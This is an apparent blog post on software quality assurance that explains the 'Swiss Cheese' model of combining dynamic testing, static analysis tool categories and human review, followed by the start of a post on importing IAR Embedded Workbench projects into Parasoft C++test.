    Validation is focused on assessment of system predicates, rather than their confirmation. In other words, validation asks: should the system actually perform a particular behaviour, or have a particular quality? Validation assesses the system in terms of good/bad.

    Just to confuse matters, I will use the terms validation and verification (V&V) and testing interchangeably.

    Introducing the “Swiss Cheese” approach to testing

    Testing is often the last resort for finding mistakes. A requirements specification is produced, then a design is created and implemented. Finally, testing is used to verify the design against the requirements and to validate both the design and the requirements. Testing cannot be a perfect technique; done poorly, many faults will remain in the system.

    image

    Figure 2 – The cost of finding – and fixing – a bug

     

    This is a well-known graph. It shows the (relative) cost of finding – and fixing – a fault in a system throughout the lifecycle of the project. In simple terms it shows that it can cost orders of magnitude more to find and fix a problem at the end of the development lifecycle than during the early stages; and even more once the project is in service.

    A key point to note: testing does not improve your software, and it is not about proving the software has no faults (that is impossible!). Testing is a quality assessment technique. It provides evidence – in the form of testing metrics – to support the engineers’ claims that their design works and is valid.

    Just testing the software doesn’t make it better:

    • Testing merely identifies the faults
    • Fixing the faults makes the software better (although not always!)

    And simply writing more tests won’t make your software better – you must improve your development practices to get better software. The more testing you do, the better your product confidence should be – provided you perform good tests!

    Closing the holes (improving your testing) requires effort and costs money. Moreover, the more sophisticated, rigorous and detailed you make any particular testing technique, the more it will cost. In fact, the cost of applying a technique increases non-linearly with its rigour:

    image

    Figure 3 – The cost of improving any particular testing technique

     

    Trying to ‘perfect’ one technique – for example, black-box unit testing – is not a cost-effective way to gain product confidence. Using multiple, independent techniques (each playing to their own strengths) is far more effective.

    The “Swiss Cheese” approach to testing uses multiple techniques, each with a different focus. The techniques are applied with the clear knowledge that no technique is perfect (nor should it be) but the flaws in any one technique do not overlap (much!) with the flaws of another layer.

    image

    Figure 4 – the Swiss Cheese model

     

    The Error-Fault-Failure chain

    clip_image010

    Figure 5 – The Error-Fault-Failure chain

     

    The Error-Fault-Failure chain shows the propagation of mistakes through the development lifecycle. Mistakes made by engineers lead to errors; errors manifest as (latent) faults – code just waiting to go wrong; and in some cases a fault leads to the system deviating from its desired behaviour – a failure.

    Clearly finding latent faults before they become failures is more effective than just trying to detect failures; and finding errors that lead to latent faults is more effective still.

    Dynamic Testing

    Dynamic Testing focuses on identifying failures.

    Black box testing is concerned with measuring the correctness of the system’s behaviour, performance or other quality. Black box testing is therefore primarily a verification technique.

    Black box testing tests the specification without knowledge of the implementation. The unit under test is stimulated via its interface(s). Black box testing therefore requires a complete, consistent, unambiguous specification to test against.

    Black box testing typically involves isolating a subset of the system and executing it in isolation in a simulated environment.

    White box testing, or coverage testing, is about establishing confidence in the structure of the code. Coverage testing focuses on the rigour of the dynamic testing process.

    Coverage testing is not concerned with verification or validation but with ensuring all code has been adequately exercised. The motivation is that code that has not been executed during testing may contain faults; and if we don’t exercise that code, the faults may manifest themselves when the system is in service.

    Dynamic testing involves execution of the software in an environment – simulated at first and, later in the development cycle, live.

    clip_image012

    Figure 6 – Environments for executing dynamic tests

     

    Dynamic testing does not find latent faults effectively. The amount of effort required to find potential failures in your code is extremely high.

    Static Testing

    Static testing, using static analysis tools, looks for latent faults in code.

    ‘Static analysis tools’ is a generic description for tools that aid verification without having to execute the software.

    There are (currently) more than three dozen tools on the market. Most are commercial tools, but there are many academic tools, and a small number of free or shareware tools are also available.

    clip_image014

    Figure 7 – Categorisation of static analysis tools

     

    These tools are nearly always language specific – that is, there are tools for C, C++, Java, etc.

    They are commonly based on compiler technology, since the initial stages of static analysis are the same as those required for compiling code.

    Pattern Matching tools

    Pattern matching tools look for dangerous expressions. These grep-like tools search for known incorrect patterns. They can be useful for catching simple latent faults and for enforcing style standards in code.

    Semantic Analysis tools

    Semantic analysis tools are based on compiler (parser) technologies. They use the first stages of the compilation process to build an abstract syntax tree, which is then enhanced with additional semantic information. The enhanced abstract syntax tree is evaluated against a rulebase, looking for violations.

    Symbolic Execution tools

    Symbolic execution tools perform data-flow analysis. They are less concerned with language-level constructs, focusing instead on how data is created, used and destroyed.

    Abstract Interpretation tools

    Abstract interpretation involves treating the code as an abstract mathematical characterisation of its possible behaviour. This model is then executed to examine its behaviour for faults.

    There is a considerable overlap between Abstract Interpretation, Symbolic Execution and Semantic Analysis in most commercial tools.

    In practice most commercial tools use a number of techniques, both to provide better analysis and also to minimise the shortcomings of each of the techniques.

     

    clip_image016

    Figure 8 – There is considerable overlap between commercial SA tools

     

    Most tools will have a bias towards one particular technique. When choosing a tool it is prudent to consider where the tool’s bias lies and whether that suits your usage of static analysis techniques. In some cases you may consider buying more than one static analysis tool.

    Static analysis tools focus on the use (or misuse) of the programming language. They cannot make any meaningful judgements on design issues – for example cohesion, coupling, or encapsulation and abstraction flaws in the system’s design.

    Review

    Judgements on design, system evaluation, measures of good/bad, and other aspects of validation cannot be automated easily. The most effective technique to find mistakes in these aspects is human review.

    In the past, reviews have focused on (attempting to) find latent faults in code by detailed inspection. Unfortunately, this is something humans are particularly bad at, so it becomes an activity that either 1) takes a long time or 2) is very poorly executed (that is, merely given lip-service).

    The strength of human review is the ability of humans to build abstract representations and evaluate them. Thus reviews should focus on the things tools can’t automate – design, modularisation, evaluation, intrinsic quality, etc.

    Applying the Swiss Cheese model

    In the Swiss Cheese model no technique has to be perfect. Each technique is used for its strengths with the knowledge faults not found by one technique may be caught by another.

    Some faults will still get through, though!

    clip_image018

    Figure 9 – In this Swiss Cheese approach no technique needs to be perfect

     

    The aim is to spread our effort across multiple techniques to get the most effective result for the minimum effort.

    Consider: if we are not particularly diligent with any particular technique, such that each one finds only 50% of the mistakes at its level, then with three independent levels we have the potential to find 87.5% of the mistakes in the system – and this without disproportionate effort in any area. (And yes, I know this is a somewhat optimistic and simplistic scenario.)

    Importing IAR EW 5.4 Projects into Parasoft C++test

    November 17th, 2010

    Background

    Recently I have been experimenting with Parasoft’s C++test tool for static analysis of C and C++ code. As part of this I went through the process of importing an existing C project developed in IAR’s Embedded Workbench toolset. Even though importing a project and checking it against MISRA-C isn’t too taxing, I thought I would share my notes on doing this.

